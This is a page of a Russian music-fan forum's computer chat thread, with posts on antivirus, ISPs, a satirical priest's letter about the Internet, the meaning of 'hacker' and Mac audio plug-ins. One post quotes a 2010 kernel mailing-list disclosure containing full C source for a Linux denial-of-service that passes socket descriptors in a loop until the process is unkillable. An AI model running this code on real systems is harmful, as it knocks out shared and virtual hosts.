Новости :: Фотогалерея
DM Радио :: SYNTH Радио

 
   
Сообщения без ответов | Активные темы Текущее время: 27 апр Сб, 2024 20:06:42 pm 117



Начать новую тему Ответить на тему  [ Сообщений: 327 ]  На страницу Пред.  1, 2, 3, 4, 5, 6, 7 ... 11  След.
 Компьютерный клуб 
Автор Сообщение
Аватар пользователя

Зарегистрирован: 21 май Ср, 2003 16:51:48 pm 140
Сообщений: 7216
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
нихто не хочет признаваться в своей некомпетентности)

_________________
Либо убью, либо сделаю сильнее...


29 окт Пт, 2010 16:05:17 pm 301
Профиль
Аватар пользователя

Зарегистрирован: 06 мар Чт, 2003 13:11:19 pm 64
Сообщений: 13881
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Ничего страшного, пусть напишут что-нибудь, а я уже пойму.


29 окт Пт, 2010 19:21:47 pm 301
Профиль WWW
Аватар пользователя

Зарегистрирован: 21 май Ср, 2003 16:51:48 pm 140
Сообщений: 7216
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
вот говорила же Сереге, что не надо мне антивирус(( нет уперся
А теперь комп у меня че-то странно себя вести начал... навернется скоро, подозреваю

_________________
Либо убью, либо сделаю сильнее...


18 ноя Чт, 2010 20:13:45 pm 321
Профиль
Аватар пользователя

Зарегистрирован: 06 мар Чт, 2003 13:11:19 pm 64
Сообщений: 13881
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Что за антивирус?


18 ноя Чт, 2010 22:33:00 pm 321
Профиль WWW
Аватар пользователя

Зарегистрирован: 21 май Ср, 2003 16:51:48 pm 140
Сообщений: 7216
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
nod32
Я его уберу. Мне без а/в больше нравилось жить.
И вообще...я против всех этих усовершенствований, которые постоянно навязываются.
Как в компьютерных делах, так и во всех других областях жизни.

_________________
Либо убью, либо сделаю сильнее...


19 ноя Пт, 2010 10:59:03 am 322
Профиль
Аватар пользователя

Зарегистрирован: 06 мар Чт, 2003 13:11:19 pm 64
Сообщений: 13881
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Это не самый лучший антивирус. Кроме него, случаем, не стоит ещё какой-нибудь?


19 ноя Пт, 2010 14:54:03 pm 322
Профиль WWW
Аватар пользователя

Зарегистрирован: 06 мар Чт, 2003 13:11:19 pm 64
Сообщений: 13881
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
MCBC - Мобильная система вооруженных сил
http://habrahabr.ru/blogs/linux/79977/


22 ноя Пн, 2010 14:53:39 pm 325
Профиль WWW

Зарегистрирован: 17 янв Ср, 2007 15:05:40 pm 16
Сообщений: 2255
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Date Thu, 25 Nov 2010 10:57:58 +0500
Subject Simple kernel attack using socketpair. easy, 100% reproductiblle, works under guest. no way to protect :(
From Марк Коренберг <>

Simple kernel attack using socketpair. easy, 100% reproductiblle,
works under guest. no way to protect :(

See source attached.

Process become in state 'Running' but not killalble via kill -KILL.

eat 100% CPU, eat all available internal file descriptors in kernel :(

--
Segmentation fault
#include <sys/socket.h>
#include <sys/un.h>

static int send_fd (int unix_fd, int fd)
{
struct msghdr msgh;
struct cmsghdr *cmsg;
char buf[CMSG_SPACE (sizeof (fd))];
memset (&msgh, 0, sizeof (msgh));
memset (buf, 0, sizeof (buf));

msgh.msg_control = buf;
msgh.msg_controllen = sizeof (buf);

cmsg = CMSG_FIRSTHDR (&msgh);
cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;

msgh.msg_controllen = cmsg->cmsg_len;

memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
return sendmsg (unix_fd, &msgh, 0);
}

int main ()
{
int fd[2], ff[2];
int target;
if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1)
return 1;
for (;;)
{
if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)
return 2;
send_fd (ff[0], fd[0]);
send_fd (ff[0], fd[1]);
close (fd[1]);
close (fd[0]);
fd[0] = ff[0];
fd[1] = ff[1];
}
}

(с) http://lkml.org/lkml/2010/11/25/8
-------------

ахаха. ржунимагу.

ranger.

_________________
soulbrother of soulsister.

Andy! Remember us! We were your only Client!!!

Величие De/Vision недостижимо (с)

Типичный индастриал-Фронт242 вырос из Гоа, Гоагила, трансу брат родной. (c) ZABA

хомяк не при чем (с)


28 ноя Вс, 2010 16:40:37 pm 331
Профиль
Аватар пользователя

Зарегистрирован: 06 мар Чт, 2003 13:11:19 pm 64
Сообщений: 13881
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
ПИСЬМО ОТЦА СЕРАФИМИЯ

Уважаемый архимандрит Игнат!

Низко кланяется вам отец Серафимий, настоятель новой Церкви Всех Скорбящих Дикой Радости в Чертаново. Слава Господу, дела в нашей обители идут хорошо, обживаем помаленьку с Божьей помощью. Пока более пахнет краской и известью, нежели фимиамом, но послушник Настасий сказал, что это всегда так в новых строениях и, даст Бог, выветрится. Молимся, чтобы выветрилось. Молимся за здоровье строителей, так скоро сотворивших эти хоромы из стекла и камня — храни Бог турков, финнов и стройбат.

Как помните, первого января сего года вы упомянули в своей речи современные технологии служения Господу, повелев мне обосновать в нашем храме Интернет, электрическую почту и домашнюю страницу, как это заведено у отца Евлампия в Жулебинской Обители Пресвятой Девы. Через три дни, следуя вашему повелению, я ополовинил кружку пожертвований у входа и поехал по адресу, что вы мне написали. Пресвятая Богородица, там хоромы не хуже наших! А прихожан толпилось и поболе. С Божьей помощью я отсчитал должное количество денег, терпя насмешки кассирш по поводу медяков и серебра. И вот на мое имя выписали Интернет! Видит Бог — я просил написать имя на старославянском, но они ответили, что сие невозможно и записали меня латинскими буквами. При этом меня походя обхамили, назвав безглазой собакою, но я стерпел это смиренно.

Вернувшись в храм, я сразу позвонил отцу Евлампию из Жулебинской Обители в мобило и сообщил радостную весть. Отец Евлампий немедля отправил две депеши из своего Интернета в наш Интернет, но мы их никоим образом не получили, хотя ждали смиренно до пятницы. Тогда я вызвал послушника Настасия, и он сказал, что для Интернета поперед всего нужен компьютер. Пришлось полностью опустошить кружку пожертвований и с Божьей помощью отправиться за компьютером, взяв Настасия с собою для разумения. Уважаемый архимандрит Игнат! Компьютер стоил такую цену, что никоих денег нам не хватило, и пришлось пустить в ход с Божьей помощью мою карту Визу. Мы купили компьютер и к нему в изобилии разных деталей, что указал отрок Настасий. Вернулись в церковь, и Настасий наладил компьютер за алтарем, потому что там много евророзеток, да и телефонная имеется. На заре я вновь позвонил отцу Евлампию в мобило и тот справил в наш Интернет новую депешу, но мы опять ничего не получили. Послушник Настасий сказал, что надо позвонить в службу Интернет и узнать, почему не работает электрическая почта. Назначив ему послушание и далее обживать компьютер, я пошел во двор звонить. Кстати, я уже не раз спрашивал Настасия, почему мобило в церкви работает плохо, а под чистым небом хорошо, но он тоже не разумеет. Дозвонился я не сразу, а, дозвонившись, спросил, как нам получать электрическую почту в церкви? Видит Бог — меня снова грубо обхамили, сказав, что я поп, что у меня глаз нет и еще что-то про «точку Ру», что я не понял. Смиренно стерпев оскорбление, я подставил левую щеку к мобилу, но они уже повесили трубку.

Неприятности продолжались с того дня — с утра снова запил наш звонарь Егор, а послушник Настасий, хоть и умен в мирских делах, но колокольному делу не обучен. Помолившись, я помчался сам в службу Интернет, да так спешно, что меня дважды останавливало ГАИ с просьбой немедля отпустить им грехи. Приехав в службу Интернет, я отбросил смирение и пошел сразу к начальнику. Увидев меня в рясе, начальник оказал радушный прием, всячески меня привечал, поил кофием, дал свою визитку и написал на ней для нашего Интернета много слов не русских и даже не греческих. А услышав мои смиренные жалобы, долго уверял, что его работники не хамили, ибо, дескать «поп глаз нет точка Ру» означает на их языке совсем иное. «Глаз нет» — пишется в одно слово и это, якобы, название всей ихней фирмы. «Точкой Ру» они именуют всю Русь, а поп — это протокол. Слыханое ли дело, чтоб на попов протоколы заводить? Не стерпев, я спросил лукаво, каково тогда будет значение слов «Серафим собака», кои были мне брошены давече? Начальник смутился на миг и начал сходу лгать что, дескать, собака — это тоже такое слово, точнее буква, и даже знак, что пишется, дескать, знак собаки после имени в адресе, а Серафим — мое имя, а значит адрес, а значит Серафим — собака. И еще много подобной ереси он изрекал. Я не перебивал и слушал смиренно, лишь твердо смотрел ему в глаза, шептал молитву и беспрестанно осенял себя и его крестным знамением. Наконец сила Господня подействовала — смутился бесстыдник под моим ясным взором, сбился и умолк. Бог ему судья. Вижу в душе его благое стремление загладить вину своих подчиненных, но к чему лгать невесть что, будто я ничего не смыслю? Честно бы покаялся — я бы отпустил грех. Не нравится мне это место, чую, что бесовщина, но обосновать не могу.

Подъезжая к церкви, я услыхал издали звон колокола, да такой искусный, что диву дался и съехал в кювет, чуть не задавив человека, что лежал там. Решил я, что Господь сотворил чудо — протрезвил Егора и дал ему невиданное искусство звонаря. Но оказалось, что человек, на коего я чуть не наехал в кювете, это и есть мертвецки пьяный Егор. А звон происходил от того, что послушник Настасий за это время приладил на колокольню хитрое устройство, что имеет вид скворешника и именуется Савуфер. И с помощью нашего компьютера играет Савуфер с лазерного диска колокольный звон. Я велел Настасию немедля убрать с колокольни бесовскую технику и ступать на задний двор замаливать грех. Затем позвонил в мобило отцу Евлампию пожаловаться, но тот сказал, что сам давно крутит колокольный звон через Савуфер и даже ведет службы под фонограмму, когда не в голосе. Я поискал в словаре живаго великорусскаго языка Владимира Даля слово Савуфер и не нашел. Покрутил в уме так и эдак и явилось мне прозрение, что сие смесь слов «Сатана», «Вельзевул» и «Люцифер». Господи, спаси и сохрани!
Перекрестившись и окропив святой водою компьютер и колокольню, я вновь позвал послушника Настасия и велел ему продолжать чинить нам Интернет. Настасий прочел визитку с нерусскими словами, воскликнул вслух «как я сразу не догадался, что поп глаз нет!» и уселся за компьютер, не замечая моей укоризны. Отрок потрудился у компьютера дотемна и все сделал, после чего принес мне бумагу с тремя депешами от отца Евлампия, в которых было «тест», «тест» и «тест». Хоть бы слово Божье употребил. Чую я бесовщину за отцом Евлампием, но обосновать не могу.

Назавтра после обедни послушник Настасий стал делать домашнюю страницу нашей церкви — снимал со стен иконы и укладывал их в ящик, источающий мертвенный зеленый свет. Говорил, мол, сканирую. Я поискал такое слово в словаре живаго великорусскаго языка Владимира Даля и нашел только СКАНДОВАТЬ, СКАНЮЧИТЬ и СКАПУТИТЬ. Чую, что дело бесовское, но обосновать не могу.

Возился Настасий дотемна, но у него ничего не спорилось — сказал он, что новая беда с нашим Интернетом и надо ехать снова в ихний «глазнет» разбираться. Все утро он порывался ехать со мною, но я решил уберечь младую душу от греха и не брать отрока в бесовское место.

Уважаемый архимандрит Игнат! Воистину нет слов описать, что произошло там! Вышел ко мне волосатый муж, представился админом Александром Недоспасовым и сказал, что начальник говорил ему обо мне и просил всяко оказать содействие. И я, говорит, лично все улажу и покажу. Повел он меня в задние комнаты, где стояло множество компьютеров, подвел к своему компьютеру и в оном я воочию увидел черта! Черт с рогами и вилами скакал по экрану! Истово перекрестившись, я спросил строго с админа Александра, что сие означает, но тот ответил туманно про «нормальный юниксовский скринсейвер». Хотя черта проворно убрал. А затем присел к компьютеру, набрал мое имя нерусскими буквами, поколдовал немного и заявил, наглец, что, дескать, не те у меня права! Я было возмутился такой наглостью, но админ Александр ответствовал, что сейчас он мне немедля нужные права выпишет. Сейчас, — сказал он, — я сделаю чмод. Не зная, что такое «чмод», и опасаясь новой беды, я склонился над его плечом, чтоб видеть, какие кнопки он нажимает. Господи спаси и сохрани, клянусь всем святым, мне не померещилось! Сей волосатый муж набрал мое имя и «chmod 666»...
Немедля проклял я ихний «глазнет» и весь бесовский Интернет! Я бежал оттуда быстрее ветра и до сих пор молюсь, чтобы Бог ниспослал мне прощение за то, что видели мои глаза! Я запер послушника Настасия, велев ему поститься и молиться. А компьютер и все его бесовские штуки мы с Егором скинули в речку Чертановку под лед. Держитесь Интернета подальше, архимандрит Игнат, ибо Сатана искушает нас!

Искренне ваш, отец Серафимий.

ПОСТСКРИПТУМ: В словаре живаго великорусскаго языка Владимира Даля я искал слово «чмод», но нашел лишь: ЧЛЕНЪ, ЧМАРИТЬ, ЧМОКАТЬ, ЧМУРКА, ЧМЫКАТЬ, ЧМЯКАТЬ, ЧО, ЧОПОРНЫЙ, ЧОРНЫЙ, ЧОРТЪ! Спаси и сохрани нас, Господи! Чую, что не за горами царствие диавола на Земле! Чую, но обосновать не могу.


28 дек Вт, 2010 11:45:30 am 361
Профиль WWW
Аватар пользователя

Зарегистрирован: 06 мар Чт, 2003 13:11:19 pm 64
Сообщений: 13881
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Это я нашёл текст, который написал один наш гласнетовский суппортер в 2000-м году


28 дек Вт, 2010 11:47:38 am 361
Профиль WWW
Аватар пользователя

Зарегистрирован: 21 май Ср, 2003 16:51:48 pm 140
Сообщений: 7216
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Месяцев 9 назад я с Билайна перешла на Онлайм. Ну так, от нефиг делать, и на 50 р дешевле. Или даже на 150... не помню. А еще первые полгода было за полцены. Ну, это Элька протащила своего, популярного у детей, провайдера))
Ваще Элька считала, что билайн(корбина изначально) галимый, но я лично не помню такого. Ну, были провалы осенью, но все подозревают, что это как раз онлайм устроил. Помните, с каким слоганом он в атаку пошел:"Ваш провайдер подложил вам свинью?", ну и начались траблы у билайна)) Хз, мне, собсна, пофиг. Это их бизнес, пусть глотку грызут друг другу, мне ж лучше.
Кароч, сейчас перешла на МГТС. То есть не перешла еще, а ток что установили модем этот.
Хз, чем меня их агент зацепил, так то я футболю всех этих агентов. Наверно, покорил дикцией, или акцентом, или еще каким изъяном))
На днях чуть было не вступила в беседу со свидетелями иеговы, такие были милые девчушки, што прям захотелось их чаем напоить и мозги почистить малька. С трудом удержалась.. пусть лучше от иеговы терпят, всё при деле.
Кароч, звонит пацан, предлагает инет мгтс с бесплатным вайфаем, че-то про скорости. Не убедительно ни разу, плюс ко всему мне вся эта байда с техническими подробностями - темный лес. Я ваще ни разу не врубаюсь, чем мегабит от мегабайта отличается, например. Хорошо хоть, что знаю, что отличается)))
Я ему и говорю:"Да все знают, что МГТС галимый"
А он как-то неуверенно:"Это раньше так было, а щаз совсем не так"
"Не, говорю, я вам не верю. Мне надо посоветоваться"
"Хорошо, вы советуйтесь, а я вам перезвоню. Когда?"
Думая, с одной стороны, что нах мне гемор, когда и так все устраивает, с другой стороны представляю, как сидит этот головастик(непременно головастик)) хз где и пытается бабла заработать. На какую-нить xуйню, естессно. Но все равно жалко. "Ладно, говорю, звоните через неделю". И контактный телефон дала, пусть отчитается и процент получит, если че, думаю.
И забыла, само собой. Не узнала ни фига. Поэтому, когда позвонили снова, говорю:"Даффайте, ладно, свою байду устанавливайте".
Между прочим, звонил уже другой, бойкий такой, как продавец в "магазине на диване" по тв(у меня свекровь ток там все покупает). Столько раз сказал про бесплатный вайфай, и сыпал типовыми рекламными фразами так, што подумала:"Ишшо раз скажет "бесплатный вайфай", пошлю нах, забью на благотворительность".
Ну и дальше: позвонили, уточнили время, когда мастер придет, слали смс, что процесс начался-продолжается-закончен. Поэтому я в этот раз забыть не смогла и пришлось как-то элементарно пошарить, на что я подписалась-то. Кароч, отзывы xуевые, в основном. Говорят, что кач-во инета зависит от проводки, а хз, в каком она у меня состоянии, 40 лет ей, надо полагать)) Больше я ни фига не поняла. Ну, выяснила, что на онлайме у меня 10мбит(измеряла утром -да,десятка, а в час пик померять забываю, но медленнее инет, очевидно)) за 500руб, а тут я за 290р беру 3 мбит(( Но кто-то сказал, что это пофиг, реальные скорости надо смотреть...
Кароч, долой теорию нах, практика рулит.
В общем, за 10 мин парень к телефонной розетке подсоединил фильтр(со спич. кор.), шоб телефон от инета не шумел, от него провод к модему(такого же размера, как мой прежний роутер, ток беленький, zabaвный). Отдельно за 450 р настроил ноут на вайфай(или наоборот?). Оплату за инет(290р) - в конце месяца. Может, ваще одним счетом с телефоном будет приходить..? Все остальное -бесплатно.
Кароч, вещаю таперя через мгтс, посмотрим, каково оно будет.
Пока что ничем не отличается от онлайма. Телефон стал лучше звучать, ток что подруга позвонила, и я офигела, как хорошо слышно, обычно шипело...
Но, конечно, с точки зрения теории заговоров, это тут у меня, мож, всякой херни следящей наставили. Вот где гарантия, что - нет?
Хотя, я давно уже засветилась, поздно ссать)))

ЗЫ, на мою попытку измерить скорость Яндекс сказал, что у него не получается)) Дважды уже. Это о чем-то говорит, или как?
ЗЗЫ. на попытку отправить пост получила "сервер не может найти(или отобразить?0 страницу. Это о чем-то говорит или как?
PPS. на следующую уже форум не пустил, слишком долго писала пост)) хорошо, что я запомнила, что тут надо копировать на всяк случ))

_________________
Либо убью, либо сделаю сильнее...


22 апр Пт, 2011 11:44:34 am 111
Профиль
Аватар пользователя

Зарегистрирован: 21 май Ср, 2003 16:51:48 pm 140
Сообщений: 7216
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
О, щаз получилось измерить скорость: 2993кбит.
Не, не понимаю, почему при вчерашних 10ти всё было так же, как при сегодняшних 3х :roll:
и чем отличается роутер от вайфаймодема(ADSL-модема то бишь. Если это, канеш, одно и то же. В чем я не уверена. Я с этими компами ваще ни в чем не уверена))

_________________
Либо убью, либо сделаю сильнее...


22 апр Пт, 2011 11:49:56 am 111
Профиль
Аватар пользователя

Зарегистрирован: 06 мар Чт, 2003 13:11:19 pm 64
Сообщений: 13881
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Вайфай и ADSL - это две большие разницы, никакого "то бишь" тут стоять не может.
Давай лучше одеколон вези, я тот уже выпил весь.


22 апр Пт, 2011 12:10:15 pm 111
Профиль WWW
Аватар пользователя

Зарегистрирован: 21 май Ср, 2003 16:51:48 pm 140
Сообщений: 7216
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Не, такой комент одеколона не стоит.
Это раз.
Сам приезжай - это два. У меня нет времени ездить.

_________________
Либо убью, либо сделаю сильнее...


22 апр Пт, 2011 12:22:34 pm 111
Профиль
Аватар пользователя

Зарегистрирован: 21 май Ср, 2003 16:51:48 pm 140
Сообщений: 7216
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Отключила на фиг МГТС. Ну не тянет их трешка мегабит скайп даже(видео). Можно взять 6 мБит за 450 руб, но тогда уж лучше у онлайма десятка за 500. Так что мгтстырнет в жеппу. Че теперь делать с вайфаем ихним...
Сережке вместо деколона подарить, штоле :lol:

_________________
Либо убью, либо сделаю сильнее...


25 апр Пн, 2011 23:05:15 pm 114
Профиль
Аватар пользователя

Зарегистрирован: 06 мар Чт, 2003 13:11:19 pm 64
Сообщений: 13881
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Как у нас интересно всё...
http://www.lenta.ru/news/2011/07/03/rucenter/


03 июл Вс, 2011 10:24:30 am 183
Профиль WWW
Аватар пользователя

Зарегистрирован: 18 мар Вт, 2003 15:31:00 pm 76
Сообщений: 1558
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Чтобы не оффтопить в теме феста, перенесу сюда.

ranger писал(а):
Zubok писал(а):
Ситуация до боли напоминает историю про хакеров, которых считают киберпреступниками, а на самом деле термин имеет положительное значение, но большинство этого не знает.
фактически с годами значение мутировало и приобрело как раз то самое негативное значение. изначальное значение (как оно описано, скажем, стивеном леви) уже достаточно давно неприменимо.


В профессиональном мире (имею в виду более-менее продвинутых программистов, читающих профессиональные ресурсы) этот термин используется как раз в своем оригинальном значении: все эти kernel hackers, happy hacking keyboard, любые напутствия "Happy hacking!" - все они рассматриваются в оригинальном значении. А вот в остальном мире - да, согласен. Спасибо журналистам, чо. У них уже хакер - это взломщик.

_________________
Чат настоящих дИпИшЫстов (вбивай любой ник и говори!)


30 май Ср, 2012 14:02:42 pm 150
Профиль WWW

Зарегистрирован: 17 янв Ср, 2007 15:05:40 pm 16
Сообщений: 2255
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Zubok писал(а):
Чтобы не оффтопить в теме феста, перенесу сюда.

ranger писал(а):
Zubok писал(а):
Ситуация до боли напоминает историю про хакеров, которых считают киберпреступниками, а на самом деле термин имеет положительное значение, но большинство этого не знает.
фактически с годами значение мутировало и приобрело как раз то самое негативное значение. изначальное значение (как оно описано, скажем, стивеном леви) уже достаточно давно неприменимо.


В профессиональном мире (имею в виду более-менее продвинутых программистов, читающих профессиональные ресурсы) этот термин используется как раз в своем оригинальном значении: все эти kernel hackers, happy hacking keyboard, любые напутствия "Happy hacking!" - все они рассматриваются в оригинальном значении. А вот в остальном мире - да, согласен. Спасибо журналистам, чо. У них уже хакер - это взломщик.


это тоже не так :) это я тебе как представитель того самого "профессионального мира" заявляю :) всякие одиночки-линуксоиды, может, так и говорят, пытаясь повысить свое ЧСВ, однако и "программисты" уже давно разработчики (developers), "кернел-хацкеры" разве что сами себя так и зовут (отличный пример снисходительного отношения к этому термину - тут, ссылка - в топе найденных по фразе "kernel hacker") упомянутый кейборд - не более чем гикогаджет, а "щасливово хацканья" - как раз из серии ЧСВ-повышения.

к слову сказать, я не припомню, чтобы в том самом "профессиональном мире" где-то пользовались термином "программист" :D давно не видел :D

слово "хакер" просто изменило свое значение с течением времени, и в этом ничего странного/плохого нету. бывает, чо.

ranger.

_________________
soulbrother of soulsister.

Andy! Remember us! We were your only Client!!!

Величие De/Vision недостижимо (с)

Типичный индастриал-Фронт242 вырос из Гоа, Гоагила, трансу брат родной. (c) ZABA

хомяк не при чем (с)


30 май Ср, 2012 14:36:07 pm 150
Профиль
Аватар пользователя

Зарегистрирован: 05 мар Вс, 2006 16:29:15 pm 63
Сообщений: 2946
Откуда: Moscow, Russia
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Ну щас всё-таки наблюдаются попытки вернуть изначальное значение. Взять тот же фэйсбук: https://www.facebook.com/hackercup/info

_________________
"Does believing you're the last sane man on the planet make you crazy? 'Cause if it does, maybe I am."
"You see, the thing that makes sense of this crazy world is rock and roll"


30 май Ср, 2012 14:57:04 pm 150
Профиль WWW

Зарегистрирован: 17 янв Ср, 2007 15:05:40 pm 16
Сообщений: 2255
Ответить с цитатой
Сообщение Re: Компьютерный клуб
parafin писал(а):
Ну щас всё-таки наблюдаются попытки вернуть изначальное значение. Взять тот же фэйсбук: https://www.facebook.com/hackercup/info


попытки наблюдаются, но, с моей точки зрения, предпринимаются они скорее теми, кому слово "хакер" греет душу, но негативный смысл мешает. нерепрезентативно.

ranger.

_________________
soulbrother of soulsister.

Andy! Remember us! We were your only Client!!!

Величие De/Vision недостижимо (с)

Типичный индастриал-Фронт242 вырос из Гоа, Гоагила, трансу брат родной. (c) ZABA

хомяк не при чем (с)


30 май Ср, 2012 15:39:48 pm 150
Профиль
Аватар пользователя

Зарегистрирован: 05 мар Вс, 2006 16:29:15 pm 63
Сообщений: 2946
Откуда: Moscow, Russia
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Будет однако сложно отделаться от ассоциаций слова "хак" с чем-то грязным, каким-нить костылём. А хакер исходя из словообразования это тот, кто делает хаки. По идеи же я так понимаю хак должно означать какое-то новое, необычное использование или совмещение технологий.

_________________
"Does believing you're the last sane man on the planet make you crazy? 'Cause if it does, maybe I am."
"You see, the thing that makes sense of this crazy world is rock and roll"


30 май Ср, 2012 16:27:59 pm 150
Профиль WWW
Аватар пользователя

Зарегистрирован: 18 мар Вт, 2003 15:31:00 pm 76
Сообщений: 1558
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
parafin писал(а):
Будет однако сложно отделаться от ассоциаций слова "хак" с чем-то грязным, каким-нить костылём. А хакер исходя из словообразования это тот, кто делает хаки. По идеи же я так понимаю хак должно означать какое-то новое, необычное использование или совмещение технологий.


Ага, слово "хак" воспринимается как синоним "я тут по-быстрому пришил морковку на лоб. Некрасиво, но работает". Некоторые, однако, дифференцируют хаки и различают хорошие хаки от "ugly hack" или "dirty hack". Но таких еще меньше, чем тех, кто слово "хакер" воспринимает по-старому.

_________________
Чат настоящих дИпИшЫстов (вбивай любой ник и говори!)


30 май Ср, 2012 20:07:11 pm 150
Профиль WWW
Аватар пользователя

Зарегистрирован: 06 мар Чт, 2003 13:11:19 pm 64
Сообщений: 13881
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
У моих программеров хаком называется нечто необычное, с помощью чего иногда в одну строчку решаются разные программистские и верстальные задачки.

Вот примеры хаков, кстати - http://verstka.pro/notes/o-validnosti-i ... nosti.html


30 май Ср, 2012 20:30:57 pm 150
Профиль WWW
Аватар пользователя

Зарегистрирован: 18 мар Вт, 2003 15:31:00 pm 76
Сообщений: 1558
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
SNK писал(а):
У моих программеров хаком называется нечто необычное, с помощью чего иногда в одну строчку решаются разные программистские и верстальные задачки.


Мои программисты (пардон, разработчики) тоже любят хаки, lol. :)

_________________
Чат настоящих дИпИшЫстов (вбивай любой ник и говори!)


31 май Чт, 2012 23:18:54 pm 151
Профиль WWW
Аватар пользователя

Зарегистрирован: 06 мар Чт, 2003 13:11:19 pm 64
Сообщений: 13881
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Круто. А как на емаксе пропатчить кде2?


31 май Чт, 2012 23:57:30 pm 151
Профиль WWW
Аватар пользователя

Зарегистрирован: 18 мар Вт, 2003 15:31:00 pm 76
Сообщений: 1558
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
SNK писал(а):
Круто. А как на емаксе пропатчить кде2?


KDE2 теперь можно не только пропатчить на Emacs, а написать на нем, в том числе и под фрибздю. :)

_________________
Чат настоящих дИпИшЫстов (вбивай любой ник и говори!)


01 июн Пт, 2012 9:17:05 am 152
Профиль WWW

Зарегистрирован: 17 янв Ср, 2007 15:05:40 pm 16
Сообщений: 2255
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Zubok писал(а):
SNK писал(а):
У моих программеров хаком называется нечто необычное, с помощью чего иногда в одну строчку решаются разные программистские и верстальные задачки.


Мои программисты (пардон, разработчики) тоже любят хаки, lol. :)


ахаха зубок звезда лора LOL!!!

ranger.

_________________
soulbrother of soulsister.

Andy! Remember us! We were your only Client!!!

Величие De/Vision недостижимо (с)

Типичный индастриал-Фронт242 вырос из Гоа, Гоагила, трансу брат родной. (c) ZABA

хомяк не при чем (с)


01 июн Пт, 2012 16:12:12 pm 152
Профиль
Аватар пользователя

Зарегистрирован: 18 мар Вт, 2003 15:31:00 pm 76
Сообщений: 1558
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
ranger писал(а):
ахаха зубок звезда лора LOL!!!


Just for fun. Несмотря на мою активность там, я профессионально к разработке ПО, администрированию и вообще к IT отношения не имею, хотя и обладаю в этом направлении достаточным опытом и умениями по определенным направлениям. Весь мой личный интерес сконцентрирован на свободном ПО. ЛОР - это неплохой русскоязычный технический форум. Тем более, что я там уже больше 10 лет присутствую. Уже привык. ЛОР в сто раз лучше, чем какой-нибудь гламурный швабрашвабр с их никому не нужными старфапами, ябблодрочерами и андроидофагами. :)

_________________
Чат настоящих дИпИшЫстов (вбивай любой ник и говори!)


02 июн Сб, 2012 22:32:10 pm 153
Профиль WWW
Аватар пользователя

Зарегистрирован: 06 мар Чт, 2003 13:11:19 pm 64
Сообщений: 13881
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
Жень, слушай, а как мне прочистить мак от ненужных кодеков?
Поставил прогу как-то, она типа улучшала звук, добавляла эффекты. Потом снёс, а потом обнаружил, что djay стал "квакать".
Завёл нового юзера - под ним тоже звук "квакает".
То есть где-то в аудиодрайвере в системе появился ненужный мне фильтр.
Как его удалить?


03 июн Вс, 2012 0:42:46 am 154
Профиль WWW
Аватар пользователя

Зарегистрирован: 18 мар Вт, 2003 15:31:00 pm 76
Сообщений: 1558
Откуда: Москва
Ответить с цитатой
Сообщение Re: Компьютерный клуб
SNK писал(а):
Жень, слушай, а как мне прочистить мак от ненужных кодеков?
Поставил прогу как-то, она типа улучшала звук, добавляла эффекты. Потом снёс, а потом обнаружил, что djay стал "квакать".


А программа-то как называлась, которая улучшала? А "квакающий" звук - это был такой кодек там?

Цитата:
Завёл нового юзера - под ним тоже звук "квакает". То есть где-то в аудиодрайвере в системе появился ненужный мне фильтр. Как его удалить?


Ну, если дело в кодеке и заведение нового юзера проблемы не решает, то вероятно, что программа насрала в системную /Library/Audio/Plug-Ins/Components. Глянь, может, там какой-то компонент от программки-улучшайзера остался (может, по названию догадаешься). Если не догадаешься, то попробуй подозрительные плагины временно переносить оттуда в другую папку, чтобы определить, кто виновен.

_________________
Чат настоящих дИпИшЫстов (вбивай любой ник и говори!)


03 июн Вс, 2012 1:34:15 am 154
Профиль WWW
Показать сообщения за:  Сортировать по:  
Начать новую тему Ответить на тему  [ Сообщений: 327 ]  На страницу Пред.  1, 2, 3, 4, 5, 6, 7 ... 11  След.


Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 68


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Перейти:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group.
Designed by Vjacheslav Trushkin.
Русская поддержка phpBB3